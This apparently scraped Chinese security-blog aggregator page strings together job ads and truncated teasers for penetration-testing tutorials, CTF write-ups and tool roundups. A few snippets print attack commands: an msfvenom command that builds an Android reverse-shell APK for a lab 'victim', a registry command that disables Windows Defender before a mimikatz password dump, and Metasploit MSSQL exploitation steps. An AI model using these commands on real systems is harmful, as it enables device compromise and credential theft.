记录黑客技术中优秀的内容,传播黑客文化,分享黑客技术精华美团红队安全招聘人才!
美团红队安全招聘
1. 岗位要求:
a. 统招本科或以上学历,至少2年以上的安全从业经验,能适应运营和运维工作;
b. 具备扎实的计算机及安全技术基础(网络、系统、漏洞利用技术原理等方面);
c. 具备网络攻防及应急响应的经验,具备较强的分析能力;
d. 至少熟练掌握一门编程语言,并针对安全漏洞、防御绕过具备较强的exploit自制能力;
e. 务实、自驱,具备良好的协调推动、沟通、团队合作能力。
白帽黑客教你Kali Linux:数据库密码脆弱性攻防演练下
一、课前声明1、本分享仅做学习交流,请自觉遵守法律法规!2、搜索:Kali 与编程,学习更多网络攻防干货!3、Kali 与编程每天准时更新,敬请学习和关注!二、资源装备1.安装好 Kali Linux 的虚拟机一台2.搭建好Sql server的靶机一个;3.整装待发的小白一个。三、 战略安排3.1 进入Metasploit(msf)渗透测试框架,如下图所示。命令:msfconsole3.2 利用Metasploit(msf)渗透框架对目标主机漏洞利用模块进行检索,如下图所示。命令:search mssql_exec3.3 如下图所示,利用检索到的漏洞利用模块。
心动网络安全团队高薪招聘
公司介绍
我们是一支热爱游戏、热爱用户、充满个性的团队,也是一支有技术、有梦想、坚持初心的团队。自创业以来,我们坚信可以用科技与艺术,智慧与勇气,让世界变得更加有趣和美好。我们敢于颠覆,突破局限,只为还原游戏本身的乐趣,我们坚持探索,乐于创新,不断尝试去赋予游戏以新的形式。我们始终倾听玩家最真实的需求与心声,打造平等且纯粹的游戏社区,也同样不囿于游戏产业,始终致力于提供优质的综合娱乐服务体验。
招聘岗位
安全运营工程师岗位职责1、安全基础设施的建设与运营,如主机agent、SoC、木马检测、扫描系统、WAF、入侵检测、流量分析等;2、安全系统日志的分析,策略开发与运营;3、安全事件的应急处理。
白帽黑客与网络安全工程师教你:使用Metasploit进行FTP服务扫描
课前声明:1、本分享仅做学习交流,请自觉遵守法律法规!2、搜索:Kali与编程,学习更多网络攻防干货!3、Kali与编程每天准时更新,敬请学习和关注!3.1 在受害者Win2008 Server虚拟机配置防火墙(关闭防火墙),如下图所示。命令:Win+R/cmd/firewall.cpl3.2 在攻击方主机(Kali Linux主机)代开Postgresql数据库,如下图所示。命令:service postgresql start3.3 在攻击方Kali Linux主机打开Metasploit(msf)渗透框架,如下图所示。
黑客破解wifi密码-超详细过程
前期准备VMware Workstation虚拟机在虚拟机安装好kail linunx系统无线网卡(芯片为3070或者1887L都支持Linux)一.打开终端,用airmon-ng命令查看如果出现无法访问
CISCN华东南赛区php健康宝wp&思考
前言
大家好,我是北京联合大学-小帽,也是本题的出题人。熟悉我的朋友们知道,平时喜欢做做欢乐杂项休闲休闲,所以这次的题目算是个披着web皮的半Misc。 由于微信小程序的开发简单、操作方便等优势,很多的公司、部门都喜欢制作小程序简化工作流程。在红蓝对抗、渗透测试等等场景,蓝队的信息中心可能会遗漏小程序这一边界(有可能是某个部门自己找外包做的,信息中心根本不知道它的存在)。而在程序开发过程中,开发者很容易信任某些用户输入,例如直接COPY官方文档中对麦克风、摄像头的操作而忘记了对上传的语音、视频检验。
另:复现可能会上BUUOJ,敬请期待。
从SQL注入到幸运域控
这是 酒仙桥六号部队 的第 37 篇文章。
全文共计2124个字,预计阅读时长8分钟。
背景
在某个午后,接到上级的任务需要对某个授权的目标进行渗透测试,于是磨刀霍霍向牛羊。
寻找突破口
由于这次给的目标范围很窄,只有两个域名跟两个IP,本来以为突破口不是那么好搞到,但拿到目标站点打开一看,心里稍微松了一口气,通过站点的氛围来看,应该是个运行很多年的系统了。
一次授权的渗透测试
前言一次正规且授权的测试,未使用任何扫描器,全程手工。这个客户呢是做的一个培训资料的商城。大概样子就是这样,其实当时拿到以后客户说不允许用任何扫描器,还有一点点懵。Thinkphp5.1.37 LTS 加 JQuery 1.7.2开始首先一个账户是必须要有的,难处在于因为验证码还在对接中,没法注册。只能要一个内置账户了。既然是thinkphp,习惯性的先试试runtime缓存目录看在不在。不存在。那么看看源代码直接访问static试试目录遍历,试了upload,js等等,也没有翻出一个有用的,那就进管理中心看看吧。首先是留言板随便提交了个图片,返回看详情。这里我开了抓包。
xss平台搭建 创建项目没反映 解决办法
xss平台搭建 创建项目没反映解决办法最近有学员反映 第五章漏洞学习与挖掘18课 WEB安全第五章 漏洞学习与利用02xss利用平台搭建
提到的问题 问题原因?
来路不明的安装包请勿安装
前言本次渗透为靶机测试。切勿用于非法用途!攻击者:192.168.1.3 termux+metasploit受害者:192.168.1.2 Android 5.1 - Linux 3.10.72+ (aarch64)使用模块:multi/handler首先生成安卓木马msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.3 LPORT=3800 -o s.apk将其移动到/storage/emulated/0/360目录。并使用蓝牙发送给受害者者。受害者安装即可。回到攻击者,启动msfconsole。
发布时间:2020-09-01 10:04 |
阅读:10685 | 评论:0 |
标签:渗透测试
分享10个渗透测试最佳工具的使用方法及下载链接
渗透测试的目的不仅是找到安全系统的易受攻击元素,还要检查企业中安全策略的合规性,衡量任何安全问题的意识和范围,并查看可能性在真正的外部实体网络攻击事件中,网络可能会遇到什么灾难。实质上,渗透测试允许你发现可能没有考虑过的弱点区域。渗透测试者提供了一种全新的视角,帮助企业改进系统安全和采用更主动的方法。借助专业工具,渗透测试更加有效和高效,以下介绍10种最佳工具。
白帽子黑客教你:如何使用Dirbuster网站目录扫描神器?
一、背景介绍DirBuster是用来探测web服务器上的目录和隐藏文件的。因为DirBuster是采用java编写的,所以运行前要安装上java的环境。 来看一下基本的使用: ①:TargetURL下输入要探测网站的地址,需要注意的是这个地址要加上协议,看网站是http还是https。 ②:WorkMethod是选择工作方式,一个是get请求,一个是自动选择。一般选autoswitch的自动选择,它会自行判断是使用head方式或get方式。 ③:NumberofThread是选择扫描线程数,一般为30。电脑配置好的可根据情况选择。 ④:selectscanningtype是选择扫描类型。
渗透测试工具库
本地工具dirmap 子目录扫描https://gitee.com/c0ny10/dirmapsubDomainBrute 子域名扫描https://gitee.com/c0ny10/subDomainsBruteCknife WebShell管理工具https://gitee.com/c0ny10/cknifeJSFinde
从Fastjson绕WAF到打穿网闸
这是 酒仙桥六号部队 的第 29 篇文章。
全文共计2160个字,预计阅读时长8分钟。
前言
记述一次授权测试中对某企业进行测试。
PS:渗透过程中的任何敏感信息均已做过脱敏处理,如有雷同,纯属巧合。
外网渗透
通过资产收集,发现了一个XX平台,验证码特别难识别,就没有了爆破的念头。
抓包看发现参数的传递使用了JSON格式。
祭出一个Fastjosn检测的poc,网站把报错页面做了隐藏,只能进行盲打。
把poc地址指向dnslog,查看是否能收到请求。
网站使用了防火墙,payload被拦截,通过修改编码的方式,查看能否绕过。
Web渗透测试——验证码自动识别工具
我们在网站登录界面,为了安全起见,除了填写用户名和密码之外,还会要求用户输入验证码才能进行登录,验证码的作用最主要的是验证输入方是一个在电脑前正在输入的人,而不是某些程序模拟人的登录操作,这样就能有效地避免网站被攻击者进行暴力破解,从而非法获得网站的登录权限,验证码的种类也是多种多样的,其中我们常见的验证码就是图片验证码,验证码上的内容包括数字、字母、数字字母混合、汉字、算式等,这些字符往往都不太清晰,主要是为了增加识别难度,避免被软件自动识别。
域内特定目标渗透
一、获取域内信息 1 、列出该域内所有机器名 (dsquery computer domainroot -limit 65535 && net group “domain computers” /domain) 2 、列出该域内所有用户名 (dsquery
Windows Server 2016抓取明文密码
临时禁止Windows Defender
REG ADD "HKEY_LOCAL_MACHINESOFTWAREPoliciesMicrosoftWindows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
gpupdate /force 下载mimikatz后解压缩。
po
ZanTI v3.18全功能完美中文版【网络渗透】
简介这是一款安全测试工具,zANTI渗透测试,支持嗅探已连接的网络,来进行中间人攻击、端口扫描、cookie获取、路由安全、跑字典、抓包修改、远程控制、漏洞扫描、劫持等操作。该版本已汉化和免登录,需要root权限和busybox(瑞士小军刀),不可放vmos里运行哦。扫描网络功能开关最好玩的其实也是中间人,替代图片和重导向功能。假设小明正在看某二次元网站,当你使用了替代图片功能,成功劫持以后,便可换成是不是很奈斯,至于第二个功能的话emm,前提你得会建站才能恶搞,就不介绍了。
铁头娃的渗透测试
这是 酒仙桥六号部队 的第 12 篇文章。
全文共计1268个字,预计阅读时长5分钟。
前言
争当好青年,疫情期间,坚决执行政府与公司的要求,无奈在家办公的我一如既往的接到了渗透测试的任务。
正篇
话不多说,开干。
01
信息搜集
老规矩,第一步先从信息搜集开始。
对目标进行子域名搜集,并没有发现子域名。
扫描网站目录文件,就一个后台登陆页面,其他什么都没有发现。
之后还进行了nmap端口扫描,也没有发现什么有价值的问题。
没办法,只能正面硬刚了。
Bash远程解析命令执行漏洞
本文中使用的脚本仅限于学习交流,请勿非法使用,造成的一切后果,均由使用者承担,特此声明。最近在做护网前的内网测试准备,在测试过程中发现内网中存在大量的Bash远程解析命令执行漏洞,说实话这个漏洞有点陈旧了,但是对于渗透测试人员来说,这个漏洞是可以直接获取到目标服务的sehll,闲暇时间进行对此漏洞进行了再一次的复现,并编写了一个比较low的检测脚本和反弹shell的脚本。
黑客大神告诉你:Getshell总结
无论是常规渗透测试还是攻防对抗,亦或黑灰产对抗、APT攻击,getshell 是一个从内到外的里程碑成果。我们接下来总结下常见拿shell的一些思路和方法。文中可能有一些不足之处,还望大佬不吝赐教。
记一次渗透测试从XSS到Getshell过程(详细到无语)
0X00 前言
前段时间有幸和大佬们参加了一次一周的攻防演练,让我这个菜鸡体验到了红队的感觉。所以打算记录一下其中一个花了三天由xss存储到后台的踩坑过程,希望大佬们多带带。
0X01 钓鱼
到了攻防演练的第二天,早上有个同事和我说这边的一个目标存在存储xss,已经打回了cookie,但是对方开启了http-only无法利用,让我帮忙看看能不能进行钓鱼或者什么的。
于是我打开这个站看了一下登陆界面,把登陆界面扒了下来。
机缘巧合之下拿下个发卡网还撸了把羊毛
0x01 事情经过
家乡群有个不是我们老家的广告狗天天发“出售微信抢红包软件”广告,发一次两次就算了,每天都发。最讨厌的是我在群里吹牛逼的时候他出来发广告?严重影响群内人员吹逼,十分可恶~,然后加了好友,居然发现这是我初中同学,在和他py一番了,他居然同意我对他的网站进行渗透测试,那就干就完事了,站长都同意授权了,开干
0x02 渗透过程
网站打开这个样子↓↓↓
意外发现他还卖手机短信轰炸,电话轰炸的商品,必须干他啊!
随便点几个网页在参数的值后面加个'就找到个注入
SQLMap跑数据库没有发现后台管理员相关信息,陷入了沉思。
安全工程师-【贝壳找房】21届校招内推火热进行中
公司介绍:
贝壳找房创立于2018年初,定位于技术驱动的品质居住服务平台。贝壳找房致力于聚合和赋能全行业的优质服务者,打造开放合作的行业生态,为消费者提供包括二手房、新房、租赁和家装等全方位的居住服务。贝壳找房将继承和升级链家网在产品技术、品质控制和数据挖掘等方面的优势能力,继承和持续迭代大数据产品“楼盘字典”,研发和应用VR看房等创新技术手段,为消费者提供更好的服务体验。通过线上交易流程的可视化、线下的闭环服务和平台承诺,为消费者提供安全保障。
发布时间:2020-08-05 19:47 |
阅读:20639 | 评论:0 |
标签:安全招聘 waf 代码与基础环境安全质量控制 多层风险与威胁感知 安全加固方案调研与设计 安全漏洞修复 安全设计评审 安
日常渗透测试搞站记录
DB2 数据库权限执行系统命令
记录一下拿到db2数据库权限之后,进行系统命令执行的过程,db2默认绑定的是50000端口:
1、创建一个临时的表
CREATE TABLE 数
年度盘点 | 安全测试者偏爱的安全测试工具
1. Metasploit (免费)
2. Wifiphisher(免费)
1. John the Ripper (免费)
2. THC Hydra (免费)
3. Aircrack (免费)
1. Nmap (免费)
2. Net
MITM6:用IPv6攻陷IPv4网络的工具
WPAD利用的简短史
随着IPv6概念的提出,互联网上针对IPv6协议的使用也日渐增多,但即便如此IPv6在公司内部却并不受欢迎,很少会有公司使用IPv6。然而,大多数公司可能都忽略了一个问题,虽然IPv6可能没有被我们主动启用,但自Windows Vista以来的所有Windows版本(包括服务器版本)都默认启用了IPv6,并且优先级高于IPv4。
在本篇博文中,我将为大家介绍一种针对IPv6的攻击:即利用Windows网络中的默认IPv6配置,伪装DNS服务器来欺骗DNS reply,并将流量重定向到攻击者指定的端点。
One-Lin3r:懒人的福音,渗透测试单行化工具
下载地址
演示视频
工具安装
工具运行截图
今天给大家介绍一款名叫One-Lin3r的渗透测试工具工具,这款工具可谓是“懒人”的福音,因为只需要输入一行命令,它就可以帮助我们完成渗透测试任务。
One-Lin3r
One-Lin3r是一款简单的轻量级框架,而该工具的灵感来自于Metasploit的web-delivery模块。
公告
❤人人都能成为掌握黑客技术的英雄❤